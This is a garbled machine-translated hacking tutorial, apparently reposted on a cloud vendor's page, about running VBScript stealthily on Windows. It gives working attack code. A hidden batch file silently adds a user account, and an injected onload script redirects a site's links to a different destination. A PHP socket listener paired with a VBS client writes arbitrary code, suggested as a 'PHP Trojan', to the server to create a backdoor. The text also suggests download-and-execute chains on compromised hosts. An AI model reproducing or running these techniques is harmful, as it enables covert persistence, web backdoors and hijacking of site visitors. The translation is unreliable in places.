Very good lcx to write unconventional run Vbs_vbs

Source: Internet
Author: User
Tags connect socket echo command sapi set socket sleep
This component in XP, 2003 on the default can be used, after the call can hear the computer a foreign old man talking. Like such a code: CreateObject ("SAPI.") SpVoice "). Speak "I Love You", save into a VBS suffix after double-clicking will hear English I loved you. But then we talked about another question, how to run the VBS code without saving it as a VBS or VBE suffix.

First, use Mshta to run the VBS
HTA this type of file is also system permissions after it is run, and its invocation host is Mshta.exe. We run this line of code under CMD: Mshta vbscript:createobject ("Sapi.spvoice"). Speak ("I love You.") (Window.close), will also hear the same pronunciation. The meaning of this line of code is similar to generating an HTA file temporarily, then running the inside of the VBS code, and then calling Window.close to turn off the running window. The entire operation is not visible to the HTA window. What do you think of this way of running? At least I thought of two. One is a batch of hidden runs, with the basic code as follows:

@echo off
If "%1" = = "h" goto begin
Mshta vbscript:createobject ("Wscript.Shell"). Run ("%~nx0 h", 0) (window.close) &&exit
: Begin
Start writing the code at the bottom of REM.
NET user lcx 12345/add

This code can only double-click to run, in the running process you can not see the specific batch process running process. The second I think is the use of the injection process. There is a very popular article on the internet, "the number of calls in the MSSQL injection of parameters resulting in multiple echo resolution," the central idea is to use the VBS to connect a colon and then use the echo command to write to the injected broiler, and then call this VBS to download the file. If the call Mshta execution, download, execute once is OK. But at the command line with the Mshta directly behind the VBS code is a difficult problem is a space, but this good solution with the VBS code in the parentheses in the OK, the reader can go to try, believe me not difficult.

Second, use the IE Address bar to run VBS
Many people will use the IE Address bar to run JS, in fact, the same VBS can be, we casually open a Web site, in the Address bar input: Vbscript:msgbox (Document.links.length) After the return, you will see the current page how many connections. With the words document.links (i), href, I was replaced by a different natural number, like 0, 1, 2, 3, and so on, each showing a different link address. This part of the content is actually related to the content of DHTML. Let's take a look at the simplest example code:

<a href=http://www.sohu.com>www.sohu.com</a>
<a href=http://www.baidu.com>www.baidu.com</a>

This is two links, saved as a webpage and then clicked to jump to a different page. If this page has a cross station, I want to destroy, let the user click Www.sohu.com but ran to the page I specified can do it? In fact, just add a line of statements on it, the code is: <body onload= ' vbscript:document.links (0). href= "http://www.google.com":d ocument.links ( 0). innerhtml= "Www.sohu.com" ' >. In this case, users click Sohu will actually run to Google, the original layout of the page is not destroyed. The same DHTML elements are document.links (i). href, document.images (i) SRC, document.forms (i). Action, etc., it's fun to change the dynamic elements across the station.

Iii. calling external components to run the VBS
The VBS itself is limited in functionality, but it can interact with the outside very well. If you use the VBS to simulate the NC contract, we will call the VB component. It's clear how the VBS successfully invoked MSWINSOCK.WINSOCK,ZZZEVAZZZ. is to download the Winsock.ocs registration, and the. Reg import registry for the VB6 control's authorization key. Two files can be downloaded here in Http://zzzevazzz.bokee.com/inc/vb6controls.rar. Recently learned a period of time PHP, the Internet to see a PHP listener, you can use it to do a backdoor, s-end s.php code as follows:

?
Set some basic variables
$host = "192.168.8.100";
$port = 12345;
Set timeout time
Set_time_limit (0);
Create a socket
$socket = Socket_create (af_inet, sock_stream, 0) or die ("could not create
Socket\n ");
Bind socket to Port
$result = Socket_bind ($socket, $host, $port) or die ("could not bind to"
Socket\n ");
Start listening for links
$result = Socket_listen ($socket, 3) or die ("could not set up socket
Listener\n ");
Accept Incoming Connections
Another socket to handle traffic
$spawn = socket_accept ($socket) or die ("could not accept incoming
Connection\n ");
Get input from the client
$input = Socket_read ($spawn, 1024) or die ("could not read input\n");
Empty input string
$input = Trim ($input);//Writes input results to ok.php, which I added.
Fputs (fopen (' ok.php ', ' A + '), "$input");

Process client input and return results
$output = Strrev ($input). "\ n";
Socket_write ($spawn, $output, strlen ($output)) or die ("could not write
Output\n ");
Close sockets
Socket_close ($spawn);
Socket_close ($socket);
?>

When IE opens this PHP, the server running it will listen for Port 12345. If we use the VBS to the 12345 port, the same file in the PHP directory will generate ok.php. The content of the contract is the code we want to write to ok.php. The VBS file C.vbs the following code:

Set ie=wscript.createobject ("Internetexplorer.application")
Ie.visible=false
Ie. Navigate "http://192.168.8.100/s.php" ' s.php is the service side
While IE. Busy
Wscript.Sleep 100
Wend

Todo
Wscript.Sleep 200
Loop Until ie. Readystate=4

Set socket=wscript.createobject ("Mswinsock.winsock")
Socket. Protocol=0
Socket. remoteport= "12345" ' Port
Socket. Remotehost= "192.168.8.100" host
Socket.connect socket. RemoteHost, Socket. RemotePort ' connection
Wscript.Sleep 10
Ddd= "<?phpinfo ();>" &AMP;CHR (13) ' Here you can change to a sentence of Php Trojan
Socket. SendData DDD
Wscript.Sleep 100
WScript.Echo "OK"
' Socket.senddata Chr (13)
Socket.close

Set ie=nothing

A VBS and PHP a perfect pair, creating a very rules back door. Of course the value of this backdoor is small, but the important thing is thinking, isn't it?

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.